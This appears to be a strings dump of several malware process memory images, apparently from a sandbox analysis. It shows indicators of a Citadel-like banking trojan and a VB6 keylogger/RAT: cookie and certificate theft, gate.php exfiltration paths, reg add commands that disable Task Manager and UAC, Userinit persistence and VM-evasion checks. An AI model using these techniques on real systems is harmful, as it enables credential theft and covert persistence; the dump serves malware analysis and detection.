EBX: 0xx ECX: 0xx EDX: 0xx
EDI: 0xx ESI: 0xx EAX: 0xx
Thread ID: 0xx
Thread %d
Memory Range %d
Software\Microsoft\PCHealth\ErrorReporting\DW
OkToReportFromTheseQueues
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Failed to obtain queue mutex. GetLastError=%u
FGetQueueMutex: WaitForSingleObject returned %u
Failed to open or create queue mutex. GetLastError=%u
Failed queued reporting pester check
Failed to create run reg key
Persistent run key is set.
CoInitializeEx() returned 0x%x.
Reporting to Admin Queue
Reporting to Regular Queue
Reporting to SignOff Queue
Reporting to Headless Queue
Reporting from Regular Queue
Reporting from SignOff Queue
Reporting from Headless Queue
OOM Failed to alloc QueuedReportData
FAllocSD: GetLastError=%u
%s%s%s
FEnsureQueueDirW: GetLastError=%u
Failed to write snt. GLE: %u
Failed to create snt. GLE: %u
Failed to set info; bad queue type: %u
Failed to open reg key for queue
Failed to get windows folder path for queue: %u
Failed to move instr file from queue A to queue B - %u
Failed to move cab file from queue A to queue B - %u
Did not move any reports from admin q to user q
Did not move any reports from user q to headless q
Queue types that have reports: %u
Setting triggerAtConnectionMade to: %u
Setting triggerAtLogon to: %u
Setting the queue trigger based upon: %u
SUCCESS adding report to queue
Launched (%S)
Failed to store the SensSubscription. hr: %d
failed to allocate PROGID string: %S
Failed putting SubscriberInterface. hr: %d
Failed putting PerUser. hr: %d
Failed putting Enabled. hr: %d
Failed putting MachineName. hr: %d
Failed putting OwnerSID. hr: %d
Failed putting Description. hr: %d
Failed putting InterfaceID. hr: %d
Failed putting EventClassID. hr: %d
Failed putting MethodName. hr: %d
Failed putting SubscriptionName. hr: %d
Failed putting PublisherID. hr: %d
Failed putting SubscriberCLSID. hr: %d
Failed putting SubscriptionID. hr: %d
Failed CoCreateInstance on EventSubscription. hr: %d
Failed to remove the SensSubscription. hr: %d
failed to allocate query string: %S
Failed CoCreateInstance on EventSystem. hr: %d
SENS: StringFromIID() returned <%x>
DWSHARED: SysAllocString(%s) failed!
Failed to subscribe subscription %u. hr: %d
Failed to get data for subscription %u. hr: %d
Failed to query install reg key
Failed to open install reg key
Software\Microsoft\PCHealth\ErrorReporting\DW\Installed
HKEY_USERS\
HKEY_CURRENT_CONFIG\
HKEY_CLASSES_ROOT\
HKEY_LOCAL_MACHINE\
HKEY_CURRENT_USER\
initing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
freeing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
0addref CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
QIing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
releasing CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
deleting CDwAccessible: hwnd %x, idc %d, m_pDefAcc %x, cRef %d
creating CDwAccessible: hwnd %x, idc %d
WriteAtOffset.Write(0x%x) failed, 0xx
WriteAtOffset.Seek(0x%x) failed, 0xx
WriteMemoryFromProcess.Read(0x%I64x, 0x%x) failed, 0xx
WriteStringToPool.Write(0x%x) failed, 0xx
WriteFunctionTable.RawEntries.Write(0x%x) failed, 0xx
WriteFunctionTable.RawTable.Write(0x%x) failed, 0xx
WriteFunctionTableList.DumpTable.Write(0x%x) failed, 0xx
WriteFunctionTableList.Seek(0x%x) failed, 0xx
WriteDirectoryEntry.Write(0x%x) failed, 0xx
Thread(0x%x) callback returned FALSE
WriteSystemInfo.GetOsCsdString failed, 0xx
WriteSystemInfo.GetCpuInfo failed, 0xx
CalculateSizeForSystemInfo.GetOsCsdString failed, 0xx
WriteHeader.GetCurrentTimeDate failed, 0xx
WriteDirectoryTable.Seek(0x%x) failed, 0xx
WriteMemoryInfo.Write(0x%x) failed, 0xx
WriteMemoryInfo.QueryVirtual(0x%I64x) failed, 0xx
WriteFullMemory virtual memory layout changed, retries %d, 0x%I64x (0x%I64x:0x%I64x) vs. 0x%I64x (0x%I64x:0x%I64x)
WriteFullMemory.Memory.Write(0x%x) failed, 0xx
WriteFullMemory.Memory.Read(0x%I64x, 0x%x) failed, retries %d, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for data failed, 0xx
WriteFullMemory.Desc.Write(0x%x) failed, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for info failed, 0xx
Kernel minidump write failed, 0xx
MarshalExceptionPointers.CxRecord.Read(0x%I64x, 0x%x) failed, 0xx
MarshalExceptionPointers.ExRecord.Read(0x%I64x, 0x%x) failed, 0xx
Invalid exception record parameter count (0x%x)
Invalid exception record size (0x%x)
Invalid CPU type (0x%x)
Invalid function table size (0x%x)
GetSystemType.GetOsInfo failed, 0xx
GetSystemType.GetCpuType failed, 0xx
Write.Start failed, 0xx
Dump type requires streaming but output provider does not support streaming
Invalid dump type 0x%x
dbghelp.dll
Alloc(0x%x) failed
Thread(0x%x) will not be included
GenGetImageSections.Section.Read(0x%I64x, 0x%x) failed, 0xx
GenGetImageSections.GenImageNtHeader(0x%I64x) failed
GenGetImageSections.Read(0x%I64x, 0x%x) failed, 0xx
0GenAllocateThreadObject.GetTebInfo(0x%x) failed, 0xx
GenAllocateThreadObject.GetContext(0x%x) failed, 0xx
GenAllocateThreadObject.Open(0x%x) failed, 0xx
GenReadTlsDirectory.Index(0x%I64x, %ws) failed, 0xx
GenReadTlsDirectory(0x%I64x, %ws) unknown machine 0x%x
GenReadTlsDirectory.Read(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenDebugRecord(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenImageNtHeader(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetImageHeaderInfo(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetVersion(0x%I64x, %ws) failed, 0xx
GenAllocateProcessObject.GetPeb(0x%x) failed, 0xx
GenIncludeUnwindInfoMemory.Enum(0x%I64x, 0x%x) failed, 0xx
GenGenTebMemory.TLS(0x%I64x) failed, 0xx
GenScanAddressSpace.QueryVirtual(0x%I64x) failed, 0xx
0GenGetAuxMemory(%ws) failed, 0xx
GenGetProcessInfo.EnumUnloadedModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumUnloadedModules(0x%x) looped
GenGetProcessInfo.EnumFunctionTableEntries(0x%I64x, 0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTables(0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTables(0x%x) looped
GenGetProcessInfo.EnumModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumModules(0x%x) looped
GenGetProcessInfo.EnumThreads(0x%x) failed, 0xx
GenGetProcessInfo.EnumThreads(0x%x) looped
GenGetProcessInfo.Start(0x%x) failed, 0xx
GenWriteHandleData.Desc.Write(0x%x) failed, 0xx
GenWriteHandleData.Header.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectName.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeName.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.Start(0x%x) failed, 0xx
GenWriteHandleData.Seek(0x%x) failed, 0xx
Software\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls
Software\Microsoft\Windows NT\CurrentVersion\KnownManagedDebuggingDlls
version.dll
ntdll.dll
%$%,%4%<%
S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%a%
b%c%d%e%f%g%h%i%j%k%l%
!"#$%&'()* ,-./0123456789:;<=
!!!!2222
%%%f||||
!!!!2222||||
!"#$%&'(
'()* ,-./0
&'()* ,-./
&'()* ,-./012345
3456789
.ASex
!"#$%&'()* ,-./012
!"#$%&'()
?msodatad.dat
msodatalast.dat
Unicows.dll
Kernel32.dll
SHLWAPI.DLL
GDI32.DLL
wintrust.dll
1108160
0u.hN
0SSh 
t.WWWj
PSSh07
t5SSh(
PSSSSSSh
0SSSSh
ADVAPI32.dll
COMCTL32.dll
GDI32.dll
KERNEL32.dll
OLEACC.dll
OLEAUT32.dll
MSVCRT.dll
RPCRT4.dll
SHELL32.dll
SHLWAPI.dll
urlmon.dll
USER32.dll
VERSION.dll
WININET.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ReportEventA
ReportEventW
RegEnumKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyW
GetProcessHeap
GetSystemWindowsDirectoryW
_amsg_exit
_acmdln
ShellExecuteExA
UrlGetPartA
CreateURLMoniker
CreateDialogIndirectParamA
EnumWindows
HttpQueryInfoA
HttpSendRequestExA
HttpOpenRequestA
InternetCanonicalizeUrlA
InternetCrackUrlA
HttpEndRequestA
dw20.pdb
\devsplab1\otools\BBT_TEMP\DW20O.pdb
winword.exe
wwordlt.exe
excel.exe
excellt.exe
mspub.exe
frontpg.exe
outlook.exe
powerpnt.exe
powpntlt.exe
onenote.exe
infopath.exe
winproj.exe
ois.exe
visio.exe
`!`'`)` `
e%f-f|3 f'f/f
]!^"^#^ ^$^
t.uGuHu
x4x7x%x-x x
h&h(h.hMh:h%h h,k/k-k1k4kmk
k%lzmcmdmvm
^Q]Q~NzP}P\PGPCPLPZPIPePvPNPUPuPtPwPOP
]8^6^3^7^
ichczc]eVeQeYeWe_UOeXeUeTe
{1{ {-{/{2{8{
r6s%s4s)s:t*t3t"t%t5t6t4t/t
t&t(t%u&ukuju
WHX%X
`IaJa aEa6a2a.aFa/aOa)a@a bh
d@d%d'd
duewexei
kCpDpJpHpIpEpFp
S$S%S&S'S(S)S S,S.S2S3S5S6S8S:S;SBSFSKSNSOSPSUSVSXSYS[S]S_SbSdSeSgShSiSjSkSmStSvSzS}S~S
U U!U"U#U$U%U(U)U U:U=U?UBUGUIULUSUTUXUYUZU[U]U`UgUhUiUkUlUmUnUoUpUqUrUsUtUxUyUzU
c c!c"c#c$c%c&c'c.c0c1c5c7c?cRcSc[c\c]c^c_c`cacbcccdcfcjclcsctcyc~c
m!m#m$m&mCmDmEmFmGmHmImJmKmLmMmNmOmPmQmRmSmTmUmVmWm[m\m]mkmqmrmsm
nRsSsh
evg%f
m.tRa
gtr%x
Q%SKg
f.ebp>QI
y.yxT
fn:q%uN
aw.Toiz
RMeXe
S#S$S%S;ScSdSrSsStSuS
`!`"`&`'`)`*` `,`-`.`/`0`2`3`4`5`6`:`=`>`?`
^ ^!^"^#^$^%^&^'^.^}^
c c!c"c#c$c%c&c'c*c7c:c;cSc[c1e?e@eAeBeCeDeEe
f f!f"f#f$f%f&f'f(f)f*f f,f-f
m m!m"m#m$m%m&m'm(m)m*m m,m-m.m1m2m3m4m5m6m7m8m9m:m;m<m=m>m?m@mBmCmDmGmHmImJmKmLmMmNmOmPmQmRmSmTmUm
u u-u.uFuGuHuIuJuKuLuMuNuOuPuQuRuSu
U U!U"U#U$U%U&U'U(U4UJU
](^)^*^ ^,^-^/^0^1^
m/mAmFmVmWmXmYmZm[m\m]m^m_m`mambmcmdmemfmgmhmimjmkmlmmmnmompmqmrmsmtmumvmwmxmymzm{m|m}m~m
x x!x"x#x$x%x'x(x)x*x x,x.x/x0x1x2x3x4x5x6x7x8x9x:x;x<x=x>x?x@xAxXy_yaycydyeygyiyjykylynyoy
} }!}"}#}$}%}&}'}
] ]!]"]#]$]%]&]'](])]*] ],]-].]/]0]
]2^3^4^5^6^7^8^9^:^;^<^>^
cMeNeOePeQeReSeTeUeWeXeYeZe[e]ebe
X X!X"X#X$X%X&X'X(X)X*X X,X-X.X/X0X1X3X4X6X7X8X9X:X;X<X>X?X@XAXBXCXDXEXFXGXHXJXTX_X`XfXmX
d%d-d0d=dRdad2e\e^e_e`eaecedeeefegeheiejele
s"s#s$s%s&s(s)s,s-s/s0s1s2s3s4s5s6s8s9s>s@sGs
u$u%u&u/ujukulumunuouqurusutu
duewexeyeze{e
~ ~!~"~#~$~%~&~'~(~*~ ~-~8~:~0
| |!|"|#|$|%|&|(|)|*|-|.|/|0|1|2|6|
{3~3}3|3
eZl%u
Q.YeY
R:\Sg|p5rL
e$e#e e4e5e7e6e8eKuHeVeUeMeXe^e]erexei
s4s/s)s%s>sNsOs
s&t*t)t.tbt
2%2.bx
{ | }9},
d6exe9j
]%sOu4](n
m.t.zB}
w%xIyWy
^vcÓv
%f?iCt
U>_.lE
f.ebp
.nrR=
{fn:q%uN
crys.exe
name="Microsoft.Windows.ErrorReporter"
version="5.1.0.0"
publicKeyToken="6595b64144ccf1df" />
<description>Windows Error Reporting</description>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
1%s\%s\%s\%s\%s\%s\%s\%s
AppName: %s AppVer: %s AppStamp:%s
ModName: %s ModVer: %s ModStamp:%s
fDebug: %s Offset: %s
Main_AlwaysReportBtn=
Main_NoReportBtn=
Main_ReportBtn=
General_Reportee=
CheckBoxRegKey=
ReportingFlags=
Stage1URL=
Stage2URL=
%General_Reportee%
%u %s
%u.%u %s
%s %s %s %s in %s %s %s fDebug %s at offset %s
Bucket: d
BucketTable %d
%s, %s, %s, %s, %s, %s, %s, %s, %s, %s %s
\dw.log
policy.txt
crash.log
status.txt
hits.log
count.txt
%s\%s\%s
%s\%s\%s\%s
eDWQueuedReporting
DWPersistentQueuedReporting
"%s\%s" -%c
dwtrig20.exe
ReportSize=
\*.cab
dwq.snt
"%s" -%c %u
SEventSystem.EventSubscription
SubscriptionID=%s
#$%&%&'(
Comctl32.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\166F97.dmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
.NET Runtime 2.0 Error Reporting
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dw.log
Microsoft Application Error Reporting
11.0.8160
Windows
DW20.Exe

crys.exe_3640_rwx_00130000_0003B000:

.text
`.data
.reloc
%s, u %s %u u:u:u GMT
HTTP/1.1
HTTP/1.0
hXXp://
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
update.exe
config.bin
PR_OpenTCPSocket
cit_ffcookie.module
cit_video.module
%ds~U;MM
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
6;:5;66"
,1;(,; = 1
<! 8< ;-;
'472%9,{
F@ICTQ}cRTWAunO}mmts}NX~csgzn~)[jzyemer\]ika
8/3.xae4LOa
6 !26!1'1!
hXXps://
HTTP/1.
facebook.com
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
_getFirefoxCookie
hXXp://VVV.google.com/webhp
SSShD
SSShXe
SSShye
GetProcessHeap
CreatePipe
KERNEL32.dll
MsgWaitForMultipleObjects
OpenWindowStationW
GetProcessWindowStation
CreateWindowStationW
CloseWindowStation
SetProcessWindowStation
SetKeyboardState
ExitWindowsEx
GetKeyboardState
MapVirtualKeyW
GetKeyboardLayoutList
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
Secur32.dll
SetViewportOrgEx
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
InternetCrackUrlA
HttpAddRequestHeadersW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
WINMM.dll
PSSSSSSh
3$3*30383
6|7k7u7
9 :1:::@:
42>204:4
sXXXX
nspr4.dll
chrome.dll
\StringFileInfo\xx\%s
ntdll.dll
kernel32.dll
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
Global\XXX
SysShadow
Chrome
Firefox
%Documents and Settings%\%current user%\Application Data
{E90C4A0B-BD46-7BBE-341D-3959D67D1D48}
%Documents and Settings%\%current user%\Application Data\Tyawy\foed.qid
%Documents and Settings%\%current user%\Application Data\Tyawy
foed.qid
Global\{7F77F82E-0F63-EDC5-341D-3959D67D1D48}

svchost.exe_2084:

.text
`.data
.rsrc
MSVBVM60.DLL
DW_EXEC
S_EXEC
FTPUPLOAD
P_FTP
P_UDP
P_HTTP
P_KEYLOGGER
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
wininet.dll
DeleteUrlCacheEntryA
FindExecutableA
ShellExecuteA
VBA6.DLL
InternetOpenUrlA
<MKey>
</MKey>
update.exe
\POS.exe
\dwm.exe
<Keyl>
</Keyl>
\KY.html
.html
post.php
\output.txt
wscript.shell
WordPad.exe
HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\
HKEY_LOCAL_MACHINE\software\microsoft\Windows NT\currentversion\winlogon\Userinit
\system32\Userinit.exe
HKEY_LOCAL_MACHINE64\software\microsoft\windows\currentversion\winlogon\Userinit
\uninstall.vbs
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d "0" /f
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d "0" /f
WScript.Sleep(3000)
Scripting.FileSystemObject
PV4.deletefile
PV4.DeleteFile WScript.ScriptFullName
cmd.exe /c
\update.vbs
WScript.Sleep(2000)
Set ObjShell = WScript.CreateObject(
WScript.Shell
Set ObjVarE = ObjShell.Environment(
PV4.CopyFile
\update.exe
VARIABLE.Run
Microsoft.XMLHTTP
Adodb.Stream
Windows
gate.php
MSXML2.ServerXMLHTTP
application/x-www-form-urlencoded
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\UACDisableNotify
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
HKEY_LOCAL_MACHINE64\Software\Microsoft\Security Center\UACDisableNotify
HKEY_LOCAL_MACHINE64\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
\Melt.bat
winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2
select * from win32_operatingsystem
adoKit.dll
vboxmrxnp.dll
vmGuestLib.dll
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d "1" /f
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d "1" /f
SbieDll.dll
\Dropbox\host.db
shell32.dll, 2
shell32.dll, 3
.fldr
shell32.dll, 0
\explorer.exe
\deact.config
\pos.config
\ky.config
70144646
Shell.Application
ShellExecute
consent.exe
bin.base64
\grabbed.log
plugins/passwords.p
\Flog.log
plugins/PTF.p
\Elog.log
\UDP.ini
\HTTP.ini
\capture.jpg
.wallet
inc/email.php
\email.txt
plugins/keylogger.p
Internet Explorer\iexplore.exe
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MyApp 1.0; Windows NT 5.1)
inc/read.php
4.02.0301

dwm.exe_440:

.text
`.data
.rsrc
MSVBVM60.DLL
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
VBA6.DLL
user32.dll
SetWindowsHookExA
UnhookWindowsHookEx
kernel32.dll
GetAsyncKeyState
@*\AC:\Users\Edbitss\Documents\gorynych\source\Plugins\keylogger\Local_Security_Authority_Process.vbp
\KY.html
Key-Spy Report -
>[KEYLOGGER REPORT]</span></span></p>
4.07.0046
Hook.exe

crys.exe_3640_rwx_675A6000_00003000:

.Qg<-Qg
*Rg`.Rg|)RgL Rg

scvhost.exe_3704_rwx_00B20000_0003B000:

.text
`.data
.reloc
%s, u %s %u u:u:u GMT
HTTP/1.1
HTTP/1.0
hXXp://
; charset=%s
HTTP/1.1 %u %s
Date: %s
Content-Length: %u
Expires: %s
Content-Type: %s%s
ID: %s
value_%s
value_%s_%s
%s = "%s";
update.exe
config.bin
PR_OpenTCPSocket
cit_ffcookie.module
cit_video.module
%ds~U;MM
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
urlmon.dll
cabinet.dll
hXXp://xxxxxxxx.com/xxxx/xxxx.php
%s%s%s
gdiplus.dll
GdiplusShutdown
ole32.dll
gdi32.dll
6;:5;66"
,1;(,; = 1
<! 8< ;-;
'472%9,{
F@ICTQ}cRTWAunO}mmts}NX~csgzn~)[jzyemer\]ika
8/3.xae4LOa
6 !26!1'1!
hXXps://
HTTP/1.
facebook.com
Cookie: %s
Referer: %s
Accept: %s
Accept-Language: %s
Accept-Encoding: %s
_getFirefoxCookie
hXXp://VVV.google.com/webhp
SSShD
SSShXe
SSShye
GetProcessHeap
CreatePipe
KERNEL32.dll
MsgWaitForMultipleObjects
OpenWindowStationW
GetProcessWindowStation
CreateWindowStationW
CloseWindowStation
SetProcessWindowStation
SetKeyboardState
ExitWindowsEx
GetKeyboardState
MapVirtualKeyW
GetKeyboardLayoutList
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
RegCreateKeyW
RegEnumKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
UrlUnescapeA
SHDeleteKeyW
PathIsURLW
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
Secur32.dll
SetViewportOrgEx
GDI32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
HttpSendRequestExW
HttpSendRequestW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpSendRequestA
HttpEndRequestW
InternetCrackUrlA
HttpAddRequestHeadersW
GetUrlCacheEntryInfoW
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
VERSION.dll
WINMM.dll
PSSSSSSh
3$3*30383
6|7k7u7
9 :1:::@:
42>204:4
sXXXX
nspr4.dll
chrome.dll
\StringFileInfo\xx\%s
ntdll.dll
kernel32.dll
"%s" %s
/c "%s"
%sx.%s
%sx
SELECT * FROM %s
Company: %s
Product: %s
Version: %s
Software\Microsoft\Windows\CurrentVersion\Uninstall
%u: %s | %s | %s
Global\XXX
SysShadow
Chrome
Firefox
%Documents and Settings%\%current user%\Application Data
{E90C4A0B-BD46-7BBE-341D-3959D67D1D48}
%Documents and Settings%\%current user%\Application Data\Tyawy\foed.qid
%Documents and Settings%\%current user%\Application Data\Tyawy
foed.qid
Global\{7F77F82E-0F63-EDC5-341D-3959D67D1D48}
:\Documents and Settings\"%CurrentUserName%"\Application Data\Muaz\ydfeb.ofo
%Documents and Settings%\%current user%\Application Data\Muaz
ydfeb.ofo

scvhost.exe_3704_rwx_00CF0000_0006C000:

<1%u3
t8It.IIt#
.FGyO
FTPj
YPSSSh
9t$Lt.VV
,4,56,789
GetProcessWindowStation
3.7.13
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY\
-cmd command run "command" before reading stdin
-echo print commands before execution
-version show SQLite version
%a, %d-%b-%Y %H:%M:%S GMT
isHttpOnly
HttpOnly=YES
HttpOnly=NO
SQLITE_
d-d-d d:d:d
d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
GetProcessHeap
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjXXXXXX9XXz
MJ delete: %s
MJ collide: %s
-mjX9X
foreign key constraint failed
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
type='trigger' AND (%s)
sqlite_
table %s may not be altered
there is already another table or index with this name: %s
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
constraint %s failed
